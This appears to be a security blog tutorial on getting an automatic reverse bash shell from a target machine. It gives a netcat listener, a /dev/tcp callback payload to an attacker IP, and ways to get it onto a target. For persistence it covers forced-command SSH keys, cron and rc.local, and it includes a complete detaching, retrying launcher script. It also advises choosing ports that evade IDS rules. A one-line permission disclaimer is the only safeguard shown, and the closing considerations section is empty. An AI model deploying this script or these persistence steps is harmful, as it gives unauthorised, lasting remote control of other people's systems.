Blog | G5 Cyber Security

Auto Reverse Shell

TL;DR

This guide shows you how to get an automatic reverse bash shell from a target machine: the target opens an outbound TCP connection to a listener on your attacking machine and attaches an interactive bash to it, so no inbound port on the target is needed. This is useful for penetration testing or remote access, but use it responsibly and only on systems you have explicit permission to test.

Setting up the Listener

  1. Choose a Port: Pick a port number above 1024 that isn’t already in use (ports below 1024 require root to bind). For this example, we’ll use port 4444. Note that 4444 is a well-known default that many IDS rules flag; on a real engagement pick something less conspicuous, such as 443 or 8443.
  2. Start Netcat (nc): On your attacking machine, start listening for connections using netcat:
    nc -lvnp 4444

    This command does the following:

    • -l: Listen for incoming connections instead of connecting out.
    • -v: Verbose output (prints the connecting IP address and port).
    • -n: Use numeric IP addresses instead of resolving hostnames.
    • -p 4444: Listen on local port 4444.

    Netcat variants differ in how they parse flags. This form works with the OpenBSD netcat shipped by most current Linux distributions; if your netcat rejects it, try the flags separately (nc -l -v -n -p 4444). Remember that a plain listener exits when the first connection closes, so restart it (or use -k where supported) before the target reconnects.

Creating the Auto Reverse Shell Script

  1. Create a Bash Script: On your attacking machine, create a new file (e.g., reverse_shell.sh) with the following content:
    #!/bin/bash
    bash -i >& /dev/tcp/<attacker_ip>/4444 0>&1

    Replace <attacker_ip> with your attacking machine’s IP address. This script does the following:

    • #!/bin/bash: Shebang line, specifies the interpreter for the script. It must be bash, not sh: /dev/tcp is not a real file but a pseudo-device implemented inside bash itself, so dash or another sh will fail with "No such file or directory".
    • bash -i: Starts an interactive bash shell (-i gives you a prompt and job control).
    • >& /dev/tcp/<attacker_ip>/4444: Opens a TCP connection to port 4444 on your attacking machine and redirects both standard output and standard error into it.
    • 0>&1: Redirects standard input from the same connection, so keystrokes typed into netcat reach the shell. Together the redirections route all three streams over the socket.
  2. Make the Script Executable: Give the script execute permissions:
    chmod +x reverse_shell.sh

Transferring and Executing the Script on the Target

  1. Transfer the Script: Get the reverse_shell.sh script onto the target machine. You can use methods like:
    • scp reverse_shell.sh user@target_ip:/tmp/ (if SSH is available)
    • Using a web server to host the file and downloading it with wget or curl on the target.
    • Other file transfer methods depending on your situation.
  2. Execute the Script: On the target machine, execute the script:
    ./reverse_shell.sh

    If the execute bit was lost in transfer (some transfer methods drop it), run it as bash /tmp/reverse_shell.sh instead. Your netcat listener should then print the connecting address and show a bash prompt. Run the script in the background (./reverse_shell.sh &) or from a separate session if you still need the terminal you launched it from, because it blocks until the connection closes.

Automatic Execution (Optional)

To automatically open a reverse shell, you need a trigger that executes the script without you typing the command on the target. Which trigger is available depends heavily on the target system and your access level.

  1. SSH Key Authentication: If SSH is enabled, add an authorized key whose forced command runs the script. Edit ~/.ssh/authorized_keys on the target machine and prefix your public key with a command option:
    command="/tmp/reverse_shell.sh" ssh-rsa ... your_public_key ...

    Every login with that key then runs the script instead of a login shell, so connecting to the target with ssh -i key user@target_ip is what fires the callback. Use an absolute path: sshd runs the forced command from the account’s home directory, so a relative ./reverse_shell.sh will not be found.
  2. Cron Job: If you have cron access, schedule the script to run periodically (for example every few minutes) or at boot with an @reboot entry. This gives a callback whenever the listener is up, but not immediately on a specific connection, and each run stacks another shell unless the script checks for an existing one.
  3. Startup Script: Add the script execution command to a startup script (e.g., /etc/rc.local, or a systemd unit on distributions without rc.local) if appropriate and allowed. This requires root and fires once per boot.
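The steps above, from building the payload to installing the forced-command key, pulled together into one launcher. This is an added example written for this page, not the post’s own script: it reads the attacker address from ATTACKER_HOST and ATTACKER_PORT (names chosen here), validates them, detaches from the terminal so a forced SSH command or cron entry does not block on the shell, and retries the connection a bounded number of times (the retry count and delay are assumed defaults) so the target keeps calling back if the listener is down when the trigger fires. The authorized_keys helper adds no-pty and no-port-forwarding, which are standard sshd key options, to limit what that key can do; the path /tmp/reverse_shell.sh is illustrative.

```shell
#!/usr/bin/env bash
# Added example: parameterised reverse-shell launcher with reconnect logic.
# Not from the original post. ATTACKER_HOST/ATTACKER_PORT, the retry
# defaults and the /tmp path are assumptions; /dev/tcp is a bash feature.

# Accept an IPv4 address or hostname; reject empty strings and whitespace.
valid_host() {
  case "$1" in
    ''|*[[:space:]]*) return 1 ;;
  esac
  return 0
}

# Accept only a numeric TCP port in the unprivileged range 1024-65535.
valid_port() {
  case "$1" in
    ''|*[!0-9]*) return 1 ;;
  esac
  [ "$1" -ge 1024 ] && [ "$1" -le 65535 ]
}

# Build the one-line payload the post uses, with the placeholder filled in:
#   bash -i >& /dev/tcp/HOST/PORT 0>&1
build_payload() {
  printf 'bash -i >& /dev/tcp/%s/%s 0>&1' "$1" "$2"
}

# Build an authorized_keys line that forces the launcher to run on login.
# $1 must be an absolute path: sshd runs the forced command from the
# account's home directory, so a relative path will not be found.
forced_key_line() {
  printf 'command="%s",no-pty,no-port-forwarding %s' "$1" "$2"
}

# Connect back; if the listener is down, sleep and retry up to max_tries.
# A refused connection makes the redirection fail and the child bash exit
# non-zero immediately; a successful session returns when the operator
# exits, after which the loop offers the listener another connection.
connect_back() {
  host="$1"; port="$2"; max_tries="${3:-5}"; delay="${4:-10}"
  n=0
  while [ "$n" -lt "$max_tries" ]; do
    if bash -c "exec bash -i >& /dev/tcp/$host/$port 0>&1" 2>/dev/null; then
      return 0
    fi
    n=$((n + 1))
    sleep "$delay"
  done
  return 1
}

main() {
  host="${ATTACKER_HOST:?set ATTACKER_HOST}"
  port="${ATTACKER_PORT:-4444}"
  valid_host "$host" || { echo "bad host: $host" >&2; exit 2; }
  valid_port "$port" || { echo "bad port: $port" >&2; exit 2; }
  # Detach: ignore HUP, drop the inherited stdio, run in the background so
  # an sshd forced command, cron job or rc.local entry returns at once.
  ( trap '' HUP; connect_back "$host" "$port" ) </dev/null >/dev/null 2>&1 &
}

# Only fire when an attacker address is configured, e.g.
#   ATTACKER_HOST=10.0.0.5 ATTACKER_PORT=4444 ./reverse_shell.sh
# so that sourcing the file merely defines the functions.
if [ -n "${ATTACKER_HOST:-}" ]; then
  main "$@"
fi
```

Install it with forced_key_line /tmp/reverse_shell.sh "$(cat id_ed25519.pub)" >> ~/.ssh/authorized_keys on the target, and keep nc -lvnp 4444 running on the attacking machine before you trigger the login, because the connect-back gives up after the configured number of attempts.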

Important Considerations
